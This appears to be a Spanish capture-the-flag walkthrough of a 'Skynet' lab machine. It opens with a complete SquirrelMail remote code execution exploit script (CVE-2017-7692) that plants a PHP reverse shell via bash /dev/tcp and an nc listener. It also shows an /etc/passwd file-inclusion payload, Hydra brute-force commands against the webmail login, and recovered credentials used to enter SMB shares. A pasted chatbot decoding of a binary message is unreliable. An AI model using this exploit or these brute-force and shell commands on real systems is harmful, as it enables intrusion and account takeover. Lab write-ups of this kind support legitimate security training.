#             .':oxxxxxkkkkOOOO0000KK0x:'
#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.
#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.
#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:
#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:
#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:
#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:
#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:
#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:
#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:
#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:
#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:
#     .dxxxxxdl;. .,               .. .;cdxxxxxx:
#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:
#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.
#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
#             .':oxxxxxxxxx.ckkkkkkkkxl,.
#                 .,cdxxxxx.ckkkkkxc.
#                    .':odx.ckxl,.
#                        .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------

sqspool="/var/spool/squirrelmail/attach/"

echo -e "$int"
#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"
#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"
#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"


# Base URL
if [ $# -ne 1 ]; then
        echo -e "Usage: \n$0 SquirrelMail_URL"
        echo -e "Example: \n$0 http://target/squirrelmail/ \n"

        exit 2
fi
URL="$1"

# Log in
echo -e "\n[*] Enter SquirrelMail user credentials"
read -p  "user: " squser
read -sp "pass: " sqpass

echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect
if [ $? -eq 0 ]; then
        echo "Invalid creds"
        exit 2
fi
sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"


# Prepare Sendmail cnf
#
# * The config will launch php via the following stanza:
#
# Mlocal,       P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
#               T=DNS/RFC822/X-Unix,
#               A=php -- $u $h ${client_addr}
#
wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf

# Upload config
echo -e "\n\n[*] Uploading Sendmail config"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"
if [ ${#attachid} -lt 32 ]; then
        echo "Something went wrong. Failed to upload the sendmail file."
        exit 2
fi

# Create Sendmail cmd string according to selected payload
echo -e "\n\n[?] Select payload\n"
# SELECT PAYLOAD
echo "1 - File write (into /tmp/sqpoc)"
echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
echo
read -p "[1-2] " pchoice

case $pchoice in
        1) payload="$squser@localhost   -oQ/tmp/        -X/tmp/sqpoc"
           ;;

        2) payload="$squser@localhost   -oQ/tmp/        -C$sqspool/$attachid"
           ;;
esac

if [ $pchoice -eq 2 ]; then
        echo
        read -p "Reverese shell IP: " reverse_ip
        read -p "Reverese shell PORT: " reverse_port
fi

# Reverse shell code
phprevsh="
<?php
        \$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";
        file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);
        system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
?>"


# Set sendmail params in user settings
echo -e "\n[*] Injecting Sendmail command parameters"
token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null
if [ $? -ne 0 ]; then
        echo "Failed to inject sendmail parameters"
        exit 2
fi

# Send email which triggers the RCE vuln and runs phprevsh
echo -e "\n[*] Sending the email to trigger the vuln"
(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \
-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &

if [ $pchoice -eq 2 ]; then
        echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
        nc -vv -l -p $reverse_port
else
        echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
fi

grep -q "302 Found" /tmp/sheaders
if [ $? -eq 1 ]; then
        echo "There was a problem with sending email"
        exit 2
fi


# Done
echo -e "\n[*] All done. Exiting"







Y VEMOS ESTE OTRO EXPLOIT EXPLICATIVO:





┌──(root㉿kali)-[~]
└─# searchsploit -m php/webapps/27948.txt
  Exploit: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/27948
     Path: /usr/share/exploitdb/exploits/php/webapps/27948.txt
File Type: ASCII text

Copied to: /root/27948.txt


                                                                                                                                 
┌──(root㉿kali)-[~]
└─# ls
27948.txt  Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  exploitpaimon.sh
                                                                                                                                 
┌──(root㉿kali)-[~]
└─# mv 27948.txt exploitpaimondos.txt
                                                                                                                                 
┌──(root㉿kali)-[~]
└─# cat exploitpaimondos.txt 
source: https://www.securityfocus.com/bid/18231/info

SquirrelMail is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

A successful exploit may allow unauthorized users to view files and to execute local scripts; other attacks are also possible.

http://www.example.com/[squirrelmail dir]/src/redirect.php?plugins[]=../../../../etc/passwd%00                                                                                                                                 





--------------- INTENTAMOS CONECTOARNOS A LOS SERVICIOS DE POP3 Y IMAP SINCREDENCIALES Y NEGATIFO   -----






┌──(root㉿kali)-[~]
└─# telnet 10.10.37.190 110
Trying 10.10.37.190...
Connected to 10.10.37.190.
Escape character is '^]'.
+OK Dovecot ready.

-ERR Unknown command.
stat
-ERR Unknown command.
USER skynet
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.
^C
exit
QUIT
Connection closed by foreign host.
                                                                                                                                 
┌──(root㉿kali)-[~]
└─# ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  exploitpaimon.sh  exploitpaimondos.txt
                                                                                                                                 
┌──(root㉿kali)-[~]
└─# telnet 10.10.37.190 143
Trying 10.10.37.190...
Connected to 10.10.37.190.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot ready.
c1 LIST "" "*"
c1 BAD Error in IMAP command received by server.
c2 LOGIN guest 
c2 BAD Error in IMAP command received by server.
QUIT
* BYE Too many invalid IMAP commands.
Connection closed by foreign host.





-------------- INTENTAMOS CONECTOARNOS A LOS SERVICIOS DE SAMBA Y ENCONTRAMOS ALGO SOBRE EL USUARIO MILESDYSON   ----






┌──(root㉿kali)-[~]
└─# smbclient -L //10.10.37.190/
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SKYNET





EL UNICO RECURSO AL QUE PUDIMOS CONECTARNOS ES AL ANONIMUOS Y BINGO ENCONTRAMOS ALGO DE INFOERMACION, SIN REQUERIR DE CREDENCIALES Y NOS DESCARGAMOS LOS ARCHIVOS DE ATENTION.TXT Y LOS TRES LOGS.TXT:




┌──(root㉿kali)-[~]
└─# smbclient //10.10.37.190/anonymous               
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Nov 26 16:04:00 2020
  ..                                  D        0  Tue Sep 17 07:20:17 2019
  attention.txt                       N      163  Wed Sep 18 03:04:59 2019
  logs                                D        0  Wed Sep 18 04:42:16 2019

                9204224 blocks of size 1024. 5830064 blocks available
smb: \> cat attention.txt
cat: command not found
smb: \> less attention.txt
less: command not found
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (79.6 KiloBytes/sec) (average 79.6 KiloBytes/sec)
smb: \> get logs
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \logs
smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 04:42:16 2019
  ..                                  D        0  Thu Nov 26 16:04:00 2020
  log2.txt                            N        0  Wed Sep 18 04:42:13 2019
  log1.txt                            N      471  Wed Sep 18 04:41:59 2019
  log3.txt                            N        0  Wed Sep 18 04:42:16 2019

                9204224 blocks of size 1024. 5830064 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (230.0 KiloBytes/sec) (average 154.8 KiloBytes/sec)
smb: \logs\> get log2.txt
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 123.8 KiloBytes/sec)
smb: \logs\> get log3.txt
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 103.2 KiloBytes/sec)
smb: \logs\> 






LEEMOS LOS ARCHIVOS:




┌──(root㉿kali)-[~]
└─# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

TRADUCCION:


┌──(raíz㉿kali)-[~]
└─#atención gato.txt
Un mal funcionamiento reciente del sistema ha provocado que se cambien varias contraseñas. Todos los empleados de Skynet deben cambiar su contraseña después de ver esto.
-Miles Dyson




CATEAMOS LOS LOGS Y SOLO EL NUMERO UNO 1 TENIA PASSWD:



┌──(root㉿kali)-[~]
└─# cat log1.txt 
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
                                                                                                                                 
┌──(root㉿kali)-[~]
└─# cat log2.txt
                                                                                                                                 
┌──(root㉿kali)-[~]
└─# cat log3.txt





-------------------- FUERZA BRUTA AL PASSWD DEL SERVICIO SQUIRREMAIL USANDO BURPSUITE  SNIPER   -----


12	terminator1056	0	false	true	0	
16	terminator00	0	false	true	0	
0		200	false	false	3277	
1	cyborg007haloterminator	200	false	false	3277	
2	terminator22596	200	false	false	3277	
3	terminator219	200	false	false	3277	
4	terminator20	200	false	false	3277	
5	terminator1989	200	false	false	3277	
6	terminator1988	200	false	false	3277	
7	terminator168	200	false	false	3277	
8	terminator16	200	false	false	3277	
9	terminator143	200	false	false	3277	
10	terminator13	200	false	false	3277	
11	terminator123!@#	200	false	false	3277	
13	terminator101	200	false	false	3277	
14	terminator10	200	false	false	3277	
15	terminator02	200	false	false	3277	
17	roboterminator	200	false	false	3277	
18	pongterminator	200	false	false	3277	
19	manasturcaluterminator	200	false	false	3277	
20	exterminator95	200	false	false	3277	
21	exterminator200	200	false	false	3277	
22	dterminator	200	false	false	3277	
23	djxterminator	200	false	false	3277	
24	dexterminator	200	false	false	3277	
25	determinator	200	false	false	3277	
26	cyborg007haloterminator	200	false	false	3277	
27	avsterminator	200	false	false	3277	
28	alonsoterminator	200	false	false	3277	
29	Walterminator	200	false	false	3277	
30	79terminator6	200	false	false	3277	
31	1996terminator	200	false	false	3277	



NO VEMOS NADA QUE NOS LALAME LA ATENCION EN LOS LENGH ETC....



-------------------- FUERZA BRUTA AL PASSWD DEL SERVICIO SQUIRREMAIL USANDO HYDRA   -----

hydra -l miles -P passwdskynet.txt http://10.10.37.190/squirrelmail/src/login.php http-post-form
“login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:Login
ERROR”


hydra -l miles -P passwdskynet.txt http-post-form "http://10.10.37.190/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:incorrect"



┌──(root㉿kali)-[~]
└─# hydra -l miles -P passwdskynet.txt 10.10.37.190 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font color="#cc0000" data-darkreader-inline-color="" style="--darkreader-inline-color: #ff3d3d;"><b>ERROR</b></font>"



CASI FUNCIONA EL COPMANDO AHI QUE IDENTIFICAR BIEN EL MENSAJE DE ERROR CONTRA EL LOGIN DE SquirrelMail version 1.4.23 [SVN]:


hydra -l miles -P passwdskynet.txt 10.10.37.190 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:Login
ERROR"




hydra -l miles -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font color="#cc0000" data-darkreader-inline-color="" style="--darkreader-inline-color: #ff3d3d;"><b>ERROR</b></font>"



hydra -l miles -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>"



LUEGO DE PERFECCIONAR EL COMANDO CON HYDRA CONSEGUIMOS ACOMODAR BIEN LA DETECCION DEL LOGIN FAILD Y QUE SOLO SE FRENE AL ENCONTRARA LA PRIMER COINCIDENCIA DE PASSWD CORRECTO Y BIENGO CONSEGUIMOS EL PASSWD CORRECTO CON HYDRA HACIENDOP FUERZA BRUTA AL LOGIN SQUIRRELMAIL CON EL USER MILES, la line esta ([STATUS] attack finished for 10.10.37.103 (waiting for children to complete tests)) en el resultado nos ayudad a determinar tambien que la linea anterior fue el PASSWD correcto:





┌──(root㉿kali)-[~]
└─# hydra -l miles -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>" -vv -t 1 -stop 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-03 16:41:53
[DATA] max 1 task per 1 server, overall 1 task, 31 login tries (l:1/p:31), ~31 tries per task
[DATA] attacking http-post-form://10.10.37.103:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[80][http-post-form] host: 10.10.37.103   login: miles   password: cyborg007haloterminator
[STATUS] attack finished for 10.10.37.103 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-03 16:41:53



RESULTADO I MPORTANTE:


[80][http-post-form] host: 10.10.37.103   login: miles   password: cyborg007haloterminator




TAMBIEN CON EL USER MILESDYSON:





┌──(root㉿kali)-[~]
└─# hydra -l milesdyson -P passwdskynet.txt 10.10.37.103 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>" -vv -t 1 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-03 17:11:53
[DATA] max 1 task per 1 server, overall 1 task, 31 login tries (l:1/p:31), ~31 tries per task
[DATA] attacking http-post-form://10.10.37.103:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[80][http-post-form] host: 10.10.37.103   login: milesdyson   password: cyborg007haloterminator
[STATUS] attack finished for 10.10.37.103 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-03 17:11:53


IMPORTANTE:



[80][http-post-form] host: 10.10.37.103   login: milesdyson   password: cyborg007haloterminator





 **********************
--------- PARAMOS POR FALTA DE TIEMPO ASI QUE ESCRIBO RECORDATORIO PARA SABER QUE CONTINUAR HACIENDO, OBVIO CAMBIARAN SOLO LAS IP DE LAS MAQUINAS  ------

CONTRASEÑA DE MILES VIENDO EL LARGO DE LA RESPUESTA
miles:cyborg007haloterminator

SEGUIR PROBANDO ESTAS CREDENCIALES TAMBIEN EN LOS LOGUEOS DE POP3 Y IMAP o SSH y VER DE PULIR EL DETECTOR DE LOGIN FAILED DE HYDRA...!!!!


PROBAMOS POR POP3 Y NEGATIVO DIOERROR TLS


PROBAMOS POR IMAP Y NEGATIVO DIOERROR TLS

PROBAMOS POR SSH Y NO TOMA EL PASSWD


PROBANDO CREDENCIALES EN SMBCLIENT:


DATOS ANTERIORES:


smbclient -L //10.10.37.190/
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SKYNET


POR EL MOMENTO NO NOS TOMA LAS CREDENCIALES  MILES Y EL PASSWD EN SMB


----------------------------
***********************




------------------------- LOGIN SQUIRRELMAIL        --------------------------------




BIEN PAPA SE TNZO VOLVIMOS A PROBAR EL LOGIN EN EL PANEL DEL SERVICIO SQUIRRELMAIL PERO CON LAS SIGUINTES CREDENCIALES Y AHORA SI SE TENZO :D :


milesdyson:cyborg007haloterminator



http://10.10.37.103/squirrelmail/src/login.php


SITIO WEB:



Current Folder: INBOX 	Sign Out
Compose   Addresses   Folders   Options   Search   Help  	SquirrelMail

Toggle All	Viewing Messages: 1 to 3 (3 total)
Move Selected To: 	Transform Selected Messages: 
 
INBOX
  	   
 	From sort	Date sort	 	Subject sort
	skynet@skynet	Sep 17, 2019	 	Samba Password reset
	serenakogan@skynet	Sep 17, 2019	 	(no subject)
	serenakogan@skynet	Sep 17, 2019	 	(no subject)
Toggle All	Viewing Messages: 1 to 3 (3 total)



-----


TRATAMOS DE LEER LA INFORMACION DEL PANEL:



MENSAJE DE SKYNET@SKYNET SE TENZO TENEMOS OITRO PASSWD:


Subject:  	Samba Password reset
From:  	skynet@skynet
Date:  	Tue, September 17, 2019 9:10 pm
Priority:  	Normal
Options:  	View Full Header |  View Printable Version  | Download this as a file

We have changed your smb password after system malfunction.

Password: )s{A&2Z=F^n_E.B`




----


MENSAJE DE serenakogan@skynet SE TENEMOS ALGUN TIPO DE MENSAJE EN BINARIO Y LO PASAMOS A TEXTO PLANOP CON GPT:




From:  	serenakogan@skynet
Date:  	Tue, September 17, 2019 2:16 am
Priority:  	Normal
Options:  	View Full Header |  View Printable Version  | Download this as a file

01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111




PLANO:



Claro, el código que proporcionaste es una secuencia de bits que se puede convertir a texto. La traducción a texto plano es:

vbnet
Copy code

balls have zero to me to me to me to me to me to me to
las pelotas tienen cero para mí para mí para mí para mí para mí para mí para


Espero que esto sea útil. Si tienes más preguntas o necesitas ayuda con algo más, ¡no dudes en preguntar!




------



MENSAJE DE serenakogan@skynet SE TENEMOS ALGUN TIPO DE MENSAJE RARO RELACIONADO AL ANTERIOR PASADO EN TEXTO PLANO:




From:  	serenakogan@skynet
Date:  	Tue, September 17, 2019 2:13 am
Priority:  	Normal
Options:  	View Full Header |  View Printable Version  | Download this as a file

i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to





FRAUDGPT NOS LEYO SUPUESTAMENTE COMO QUE EL MESJAE OCULTO EN LIMPIO SERIA ESTE:


Puedo tener pelotas conmigo, tú tienes cero conmigo, todo lo demás.





-----

ANALISAMOS MAS PARTES DEL PANEL TENEMOS UNO PARA CARGAR ARCHIVOS Y ENVIAR MAIL, AGREGAR CONTACTOS; CREAR FOLDER Y MAS:

http://10.10.37.103/squirrelmail/src/compose.php?mailbox=INBOX&startMessage=1

http://10.10.37.103/squirrelmail/src/addressbook.php

http://10.10.37.103/squirrelmail/src/folders.php





---------------- SCRIPT DEL EXPLOIT ENCONTRADO CON SEARCHSPLOIT    -------------------------

NO FUNCIONO CON LAS CREDENCIALES QUE NOS SIRVIERON ANTES:






---------------- SMBCLIENT         ------------------------------

NOS LOGUEAMOS AL RECURSO DEL MILESDYSON CON EL PASSWD ENCONTRADO EN EL MAIL MENSAJE DE SKYNET@SKYNET Y SE TENZO, DESCARGAMOS VARIOS PDF, NOTES Y DOCUMENTOS QUE HABIAN:




┌──(root㉿kali)-[~]
└─# smbclient //10.10.37.103/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Sep 17 09:05:47 2019
  ..                                  D        0  Wed Sep 18 03:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 09:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 09:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 09:05:14 2019
  notes                               D        0  Tue Sep 17 09:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 09:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 09:05:14 2019

                9204224 blocks of size 1024. 5831420 blocks available
smb: \> get Improving Deep Neural Networks.pdf
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Improving
smb: \> get "Improving Deep Neural Networks.pdf"
getting file \Improving Deep Neural Networks.pdf of size 5743095 as Improving Deep Neural Networks.pdf (91942.3 KiloBytes/sec) (average 91942.5 KiloBytes/sec)
smb: \> get "Natural Language Processing-Building Sequence Models.pdf"
getting file \Natural Language Processing-Building Sequence Models.pdf of size 12927230 as Natural Language Processing-Building Sequence Models.pdf (109776.0 KiloBytes/sec) (average 103595.1 KiloBytes/sec)
smb: \> get "Convolutional Neural Networks-CNN.pdf"
getting file \Convolutional Neural Networks-CNN.pdf of size 19655446 as Convolutional Neural Networks-CNN.pdf (127117.6 KiloBytes/sec) (average 114457.2 KiloBytes/sec)
smb: \> get "Neural Networks and Deep Learning.pdf"
getting file \Neural Networks and Deep Learning.pdf of size 4304586 as Neural Networks and Deep Learning.pdf (91384.5 KiloBytes/sec) (average 111611.8 KiloBytes/sec)
smb: \> get "Structuring your Machine Learning Project.pdf"
getting file \Structuring your Machine Learning Project.pdf of size 3531427 as Structuring your Machine Learning Project.pdf (98532.8 KiloBytes/sec) (average 110489.9 KiloBytes/sec)
smb: \> get notes
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \notes

smb: \> cd notes
smb: \notes\> pwd
Current directory is \\10.10.37.103\milesdyson\notes\
smb: \notes\> ls
  .                                   D        0  Tue Sep 17 09:18:40 2019
  ..                                  D        0  Tue Sep 17 09:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 09:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 09:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 09:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 09:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 09:01:29 2019
  important.txt                       N      117  Tue Sep 17 09:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 09:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 09:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 09:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 09:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 09:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 09:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 09:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 09:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 09:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 09:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 09:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 09:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 09:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 09:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 09:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 09:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 09:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 09:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 09:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 09:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 09:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 09:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 09:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 09:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 09:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 09:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 09:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 09:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 09:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 09:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 09:01:29 2019

                9204224 blocks of size 1024. 5831412 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (38.1 KiloBytes/sec) (average 109683.7 KiloBytes/sec)
smb: \notes\> get Search.md
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \notes\Search.md





LEEMOS Y VEMOS LOS ARCHIVOS DESACRGADOS:




┌──(root㉿kali)-[~]
└─# cat important.txt 

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife


TRADUCCION:
1. Agregar funciones al CMS beta /45kra24zxs28v3yd
2. Trabajar en los planos del T-800 Modelo 101.
3. Pasar más tiempo con mi esposa


VERIFICAMOS POR LA WEB Y ERA UNA RUTA LO QUE APARECIA EN EL MENSAJE:


http://10.10.37.103/45kra24zxs28v3yd/



Miles Dyson Personal Page
Dr. Miles Bennett Dyson was the original inventor of the neural-net processor which would lead to the development of Skynet,
a computer A.I. intended to control electronically linked weapons and defend the United States.

Página personal de Miles Dyson
El Dr. Miles Bennett Dyson fue el inventor original del procesador de red neuronal que conduciría al desarrollo de Skynet.
una computadora A.I. destinado a controlar las armas vinculadas electrónicamente y defender a los Estados Unidos.

----

ANALIZAMOS LOS PDF RAPIDO Y NO VEO NINGUN DATO DE BORRADOR ANOTADO IMPORTANTE COMO PASSWD Y TAL.




